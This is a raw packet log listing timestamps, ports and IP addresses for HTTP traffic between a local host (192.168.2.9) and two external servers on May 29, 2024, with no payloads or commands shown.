May 29, 2024 15:42:08.282305956 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.282308102 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.282320023 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.282339096 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.282350063 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.282350063 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.282350063 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.282358885 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.282371044 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.282382011 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.282392979 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.282402992 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.282402992 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.282403946 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.282438993 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.282438993 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.282516956 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.282526970 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.282537937 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.282547951 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.282565117 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.282574892 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.282581091 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.282593966 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.282604933 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.282613993 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.282614946 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.282624960 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.282625914 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.282639027 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.282639980 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.282659054 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.282663107 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.282672882 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.282682896 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.282696009 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.282706976 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.282721043 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.282732964 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.282742023 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.282752037 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.282752991 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.282752037 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.282763958 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.282773018 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.282830954 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.282915115 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.283030033 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.283051968 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.283062935 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.283073902 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.283085108 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.283092022 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.283103943 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.283111095 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.283114910 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.283126116 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.283138037 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.283150911 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.283159018 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.283170938 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.283179045 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.283179998 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.283191919 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.283210993 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.283222914 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.283232927 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.283243895 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.283246994 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.283247948 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.283247948 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.283255100 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.283267975 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.283276081 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.283282995 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.283293962 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.283315897 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.283350945 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.283365965 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.283390045 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.283406973 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.283428907 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.283438921 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.283440113 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.283457994 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.283472061 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.283484936 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.283490896 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.283494949 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.283510923 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.304028034 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.304061890 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.304074049 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.304079056 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.304114103 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.304125071 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.304131985 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.304136038 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.304147959 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.304157972 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.304188967 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.304199934 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.304214001 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.304229975 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.304229975 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.304231882 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.304243088 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.304254055 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.304266930 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.304291010 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.304300070 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.334336042 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.334378958 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.334389925 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.334400892 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.334410906 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.334420919 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.334423065 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.334475040 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.334475040 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.348252058 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.348283052 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.348292112 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.348364115 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.348375082 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.348383904 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.348395109 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.348401070 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.348406076 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.348419905 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.348429918 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.348438978 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.348455906 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.348472118 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.348490000 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.348498106 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.348498106 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.348501921 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.348512888 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.348520994 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.348522902 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.348567963 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.348567963 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.371995926 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.372107983 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.372128010 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.372139931 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.372150898 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.372169971 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.372188091 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.372190952 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.372199059 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.372219086 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.372221947 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.372231960 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.372241974 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.372251987 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.372262955 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.372265100 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.372265100 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.372273922 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.372286081 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.372298002 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.372312069 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.372312069 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.372345924 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.372387886 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.372399092 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.372409105 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.372420073 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.372431993 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.372443914 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.372454882 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.372466087 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.372471094 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.372471094 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.372478008 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.372507095 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.372510910 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.372526884 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.372565985 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.372605085 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.373734951 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.373797894 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.373815060 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.373826981 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.373836994 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.373848915 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.373898029 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.373898029 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.373992920 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.374005079 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.374015093 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.374026060 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.374037027 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.374057055 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.374061108 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.374068022 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.374077082 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.374089003 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.374098063 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.374098063 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.374099970 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.374111891 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.374119043 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.374121904 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.374145985 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.374156952 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.374167919 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.374170065 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.374183893 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.374183893 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.374195099 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.374207020 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.374217987 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.374231100 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.374241114 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.374241114 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.374242067 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.374252081 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.374264002 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.374264956 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.374274015 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.374284983 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.374306917 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.374332905 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.374344110 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.374353886 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.374363899 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.374375105 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.374392986 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.374412060 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.374412060 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.374412060 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.374424934 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.374437094 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.374447107 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.374454021 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.374454021 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.374458075 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.374468088 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.374479055 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.374490023 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.374500036 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.374505997 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.374505997 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.374512911 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.374525070 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.374526978 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.374535084 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.374551058 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.374569893 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.374695063 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.374757051 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.374762058 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.374767065 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.374780893 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.374793053 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.374804020 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.374819994 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.374835968 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.393764019 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.393780947 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.393820047 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.393889904 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.393908978 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.393965960 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.393981934 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.393985033 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.393992901 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.394005060 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.394016027 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.394016981 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.394027948 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.394043922 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.394059896 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.394069910 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.394078016 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.394085884 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.394094944 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.394121885 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.394121885 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.394140959 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.438007116 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.438043118 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.438056946 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.438076019 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.438102007 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.438116074 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.438128948 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.438198090 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.438208103 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.438220024 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.438230038 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.438255072 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.440531969 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.673063993 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:10.031105042 CEST	49712	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:10.036050081 CEST	80	49712	45.61.137.215	192.168.2.9
May 29, 2024 15:42:10.036114931 CEST	49712	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:10.038269997 CEST	49712	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:10.043139935 CEST	80	49712	45.61.137.215	192.168.2.9
May 29, 2024 15:42:10.043184042 CEST	49712	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:10.048055887 CEST	80	49712	45.61.137.215	192.168.2.9
May 29, 2024 15:42:12.499260902 CEST	80	49712	45.61.137.215	192.168.2.9
May 29, 2024 15:42:12.499285936 CEST	80	49712	45.61.137.215	192.168.2.9
May 29, 2024 15:42:12.499311924 CEST	80	49712	45.61.137.215	192.168.2.9
May 29, 2024 15:42:12.499326944 CEST	80	49712	45.61.137.215	192.168.2.9
May 29, 2024 15:42:12.499334097 CEST	49712	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:12.499351978 CEST	80	49712	45.61.137.215	192.168.2.9
May 29, 2024 15:42:12.499366999 CEST	80	49712	45.61.137.215	192.168.2.9
May 29, 2024 15:42:12.499385118 CEST	49712	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:12.499391079 CEST	80	49712	45.61.137.215	192.168.2.9
May 29, 2024 15:42:12.499403954 CEST	80	49712	45.61.137.215	192.168.2.9
May 29, 2024 15:42:12.499408960 CEST	49712	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:12.499419928 CEST	80	49712	45.61.137.215	192.168.2.9
May 29, 2024 15:42:12.499453068 CEST	49712	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:12.499537945 CEST	49712	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:12.499774933 CEST	80	49712	45.61.137.215	192.168.2.9
May 29, 2024 15:42:12.500983000 CEST	49712	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:12.504431963 CEST	80	49712	45.61.137.215	192.168.2.9
May 29, 2024 15:42:12.504448891 CEST	80	49712	45.61.137.215	192.168.2.9
May 29, 2024 15:42:12.504465103 CEST	80	49712	45.61.137.215	192.168.2.9
May 29, 2024 15:42:12.504479885 CEST	80	49712	45.61.137.215	192.168.2.9
May 29, 2024 15:42:12.504492998 CEST	49712	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:12.504537106 CEST	49712	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:12.504549026 CEST	49712	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:12.645172119 CEST	49714	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:12.650084972 CEST	80	49714	45.61.137.215	192.168.2.9
May 29, 2024 15:42:12.650485039 CEST	49714	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:12.652340889 CEST	49714	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:12.657207012 CEST	80	49714	45.61.137.215	192.168.2.9
May 29, 2024 15:42:12.657429934 CEST	49714	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:12.662326097 CEST	80	49714	45.61.137.215	192.168.2.9
May 29, 2024 15:42:15.220684052 CEST	80	49714	45.61.137.215	192.168.2.9
May 29, 2024 15:42:15.220729113 CEST	80	49714	45.61.137.215	192.168.2.9
May 29, 2024 15:42:15.220840931 CEST	49714	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:15.220840931 CEST	49714	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:15.221035004 CEST	80	49714	45.61.137.215	192.168.2.9
May 29, 2024 15:42:15.221079111 CEST	49714	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:15.221084118 CEST	80	49714	45.61.137.215	192.168.2.9
May 29, 2024 15:42:15.221096992 CEST	80	49714	45.61.137.215	192.168.2.9
May 29, 2024 15:42:15.221127987 CEST	80	49714	45.61.137.215	192.168.2.9
May 29, 2024 15:42:15.221138000 CEST	80	49714	45.61.137.215	192.168.2.9
May 29, 2024 15:42:15.221157074 CEST	49714	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:15.221157074 CEST	49714	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:15.221158981 CEST	80	49714	45.61.137.215	192.168.2.9
May 29, 2024 15:42:15.221175909 CEST	80	49714	45.61.137.215	192.168.2.9
